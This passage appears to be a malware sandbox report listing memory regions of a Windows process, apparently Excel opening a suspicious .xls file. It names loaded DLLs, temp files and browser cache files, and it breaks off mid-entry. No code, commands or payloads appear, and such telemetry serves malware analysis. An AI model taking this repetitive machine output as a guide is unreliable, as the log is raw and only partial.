name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 784 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 785 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 786 start_va = 0x64f70000 end_va = 0x662c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 787 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 788 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 789 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 790 start_va = 0x64f70000 end_va = 0x662c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 791 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 792 start_va = 0x66470000 end_va = 0x677c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 793 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 794 start_va = 0x64f70000 end_va = 0x662c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 795 start_va = 0x9740000 end_va = 0x9740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 796 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 797 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 798 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 799 start_va = 0xb4c0000 end_va = 0xb5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 800 start_va = 0x9740000 end_va = 0x9740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009740000" filename = "" Region: id = 801 start_va = 0x75380000 end_va = 0x753cdfff monitored = 0 entry_point = 0x753b816e region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 802 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 803 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 804 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 805 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 806 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 807 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 808 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 809 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 810 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 811 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 812 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 813 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 814 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 815 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 816 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 817 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 818 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 819 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 820 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 821 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 822 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 823 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 824 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 825 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 826 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 827 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 828 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 829 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 830 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 831 start_va = 0x97d0000 end_va = 0x97d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097d0000" filename = "" Region: id = 832 start_va = 0xb610000 end_va = 0xb64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b610000" filename = "" Region: id = 833 start_va = 0xe670000 end_va = 0xe76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e670000" filename = "" Region: id = 834 start_va = 0x67440000 end_va = 0x677c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "xlicons.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\Windows\\Installer\\{90160000-000F-0000-0000-0000000FF1CE}\\xlicons.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\windows\\installer\\{90160000-000f-0000-0000-0000000ff1ce}\\xlicons.exe") Region: id = 835 start_va = 0x7ef89000 end_va = 0x7ef8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 836 start_va = 0x9850000 end_va = 0x988ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 837 start_va = 0xe840000 end_va = 0xe93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e840000" filename = "" Region: id = 838 start_va = 0x7ef3f000 end_va = 0x7ef41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef3f000" filename = "" Region: id = 839 start_va = 0x97d0000 end_va = 0x97d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097d0000" filename = "" Region: id = 840 start_va = 0xb4f0000 end_va = 0xb52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 841 start_va = 0xea90000 end_va = 0xeb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ea90000" filename = "" Region: id = 842 start_va = 0x7ef3c000 end_va = 0x7ef3efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef3c000" filename = "" Region: id = 843 start_va = 0x97e0000 end_va = 0x97e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097e0000" filename = "" Region: id = 844 start_va = 0x97f0000 end_va = 0x97f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097f0000" filename = "" Region: id = 845 start_va = 0x9800000 end_va = 0x9802fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009800000" filename = "" Region: id = 846 start_va = 0xb120000 end_va = 0xb175fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 847 start_va = 0xb120000 end_va = 0xb175fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 848 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 849 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 850 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 851 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 852 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 853 start_va = 0xb770000 end_va = 0xb7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b770000" filename = "" Region: id = 854 start_va = 0xecc0000 end_va = 0xedbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ecc0000" filename = "" Region: id = 855 start_va = 0x7ef39000 end_va = 0x7ef3bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef39000" filename = "" Region: id = 856 start_va = 0xb150000 end_va = 0xb18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b150000" filename = "" Region: id = 857 start_va = 0xeba0000 end_va = 0xec9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eba0000" filename = "" Region: id = 858 start_va = 0x7ef36000 end_va = 0x7ef38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef36000" filename = "" Region: id = 859 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 860 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 861 start_va = 0x98d0000 end_va = 0x98d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098d0000" filename = "" Region: id = 862 start_va = 0x72e30000 end_va = 0x72e8efff monitored = 0 entry_point = 0x72e32134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 863 start_va = 0x60b0000 end_va = 0x60b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 864 start_va = 0x60a0000 end_va = 0x60a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 865 start_va = 0x6100000 end_va = 0x6100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006100000" filename = "" Region: id = 866 start_va = 0x6100000 end_va = 0x6100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006100000" filename = "" Region: id = 867 start_va = 0x75360000 end_va = 0x75371fff monitored = 0 entry_point = 0x75361200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 868 start_va = 0x6110000 end_va = 0x611ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 869 start_va = 0x6230000 end_va = 0x6237fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 870 start_va = 0x6240000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 871 start_va = 0xeb90000 end_va = 0xef8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000eb90000" filename = "" Region: id = 872 start_va = 0x64c0000 end_va = 0x64dcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "bmxixqaylqt.xlsa176825bd774a412e72882c815206c7f59ace1feb111bb4e9xlse72882c815206c7f59ace1feb111bb4e9xls" filename = "\\Users\\kEecfMwgj\\Desktop\\bmxixqaylqt.xlsa176825bd774a412e72882c815206c7f59ace1feb111bb4e9xlse72882c815206c7f59ace1feb111bb4e9xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\bmxixqaylqt.xlsa176825bd774a412e72882c815206c7f59ace1feb111bb4e9xlse72882c815206c7f59ace1feb111bb4e9xls") Region: id = 873 start_va = 0x6100000 end_va = 0x6100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006100000" filename = "" Region: id = 874 start_va = 0x64c0000 end_va = 0x64dcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "bmxixqaylqt.xls" filename = "\\Users\\kEecfMwgj\\Desktop\\bmxixqaylqt.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\bmxixqaylqt.xls") Region: id = 875 start_va = 0xb120000 end_va = 0xb19ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "bmxixqaylqt.xls" filename = "\\Users\\kEecfMwgj\\Desktop\\bmxixqaylqt.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\bmxixqaylqt.xls") Region: id = 876 start_va = 0xb1a0000 end_va = 0xb21ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~dfd7055f6785b3501d.tmp" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DFD7055F6785B3501D.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dfd7055f6785b3501d.tmp") Region: id = 877 start_va = 0xb530000 end_va = 0xb57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b530000" filename = "" Region: id = 878 start_va = 0xb580000 end_va = 0xb5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 879 start_va = 0x64c0000 end_va = 0x64c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 880 start_va = 0x64d0000 end_va = 0x64d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064d0000" filename = "" Region: id = 881 start_va = 0x64e0000 end_va = 0x64e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 882 start_va = 0x6a70000 end_va = 0x6a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a70000" filename = "" Region: id = 883 start_va = 0x6ad0000 end_va = 0x6ad1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ad0000" filename = "" Region: id = 884 start_va = 0x97d0000 end_va = 0x980ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097d0000" filename = "" Region: id = 885 start_va = 0xbe20000 end_va = 0xbf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000be20000" filename = "" Region: id = 886 start_va = 0xc7c0000 end_va = 0xcb20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c7c0000" filename = "" Region: id = 887 start_va = 0xef90000 end_va = 0xf40efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ef90000" filename = "" Region: id = 888 start_va = 0x7ef95000 end_va = 0x7ef97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 889 start_va = 0xb810000 end_va = 0xb8cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 890 start_va = 0x67670000 end_va = 0x677c7fff monitored = 0 entry_point = 0x6767133c region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 891 start_va = 0xb8d0000 end_va = 0xb96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b8d0000" filename = "" Region: id = 892 start_va = 0xb770000 end_va = 0xb7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b770000" filename = "" Region: id = 893 start_va = 0xc7c0000 end_va = 0xc97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c7c0000" filename = "" Region: id = 894 start_va = 0xf410000 end_va = 0xf80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f410000" filename = "" Region: id = 895 start_va = 0x64d0000 end_va = 0x64d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 896 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 897 start_va = 0x6a70000 end_va = 0x6a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a70000" filename = "" Region: id = 898 start_va = 0x6ad0000 end_va = 0x6ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ad0000" filename = "" Region: id = 899 start_va = 0x6ae0000 end_va = 0x6ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ae0000" filename = "" Region: id = 900 start_va = 0x6b30000 end_va = 0x6b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b30000" filename = "" Region: id = 901 start_va = 0x7490000 end_va = 0x74a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007490000" filename = "" Region: id = 902 start_va = 0x7510000 end_va = 0x7510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 903 start_va = 0x64e0000 end_va = 0x64e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 904 start_va = 0x6ad0000 end_va = 0x6ae0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 905 start_va = 0x6a70000 end_va = 0x6a71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006a70000" filename = "" Region: id = 906 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 907 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 908 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 909 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 910 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 911 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 912 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 913 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 914 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 915 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 916 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 917 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 918 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 919 start_va = 0xbab0000 end_va = 0xbbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 920 start_va = 0xbab0000 end_va = 0xbbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 921 start_va = 0xbab0000 end_va = 0xbbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 922 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 923 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 924 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 925 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 926 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 927 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 928 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 929 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 930 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 931 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 932 start_va = 0xbab0000 end_va = 0xbbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 933 start_va = 0xbab0000 end_va = 0xbbb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 934 start_va = 0xbab0000 end_va = 0xbbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 935 start_va = 0xc980000 end_va = 0xcb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c980000" filename = "" Region: id = 936 start_va = 0x7490000 end_va = 0x7497fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 937 start_va = 0x8800000 end_va = 0x883ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 938 start_va = 0x74a0000 end_va = 0x74a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000074a0000" filename = "" Region: id = 939 start_va = 0x74320000 end_va = 0x74363fff monitored = 0 entry_point = 0x743363f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 940 start_va = 0xe260000 end_va = 0xe29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e260000" filename = "" Region: id = 941 start_va = 0x742f0000 end_va = 0x742f6fff monitored = 0 entry_point = 0x742f128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 942 start_va = 0x74300000 end_va = 0x7431bfff monitored = 0 entry_point = 0x7430a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 943 start_va = 0x740f0000 end_va = 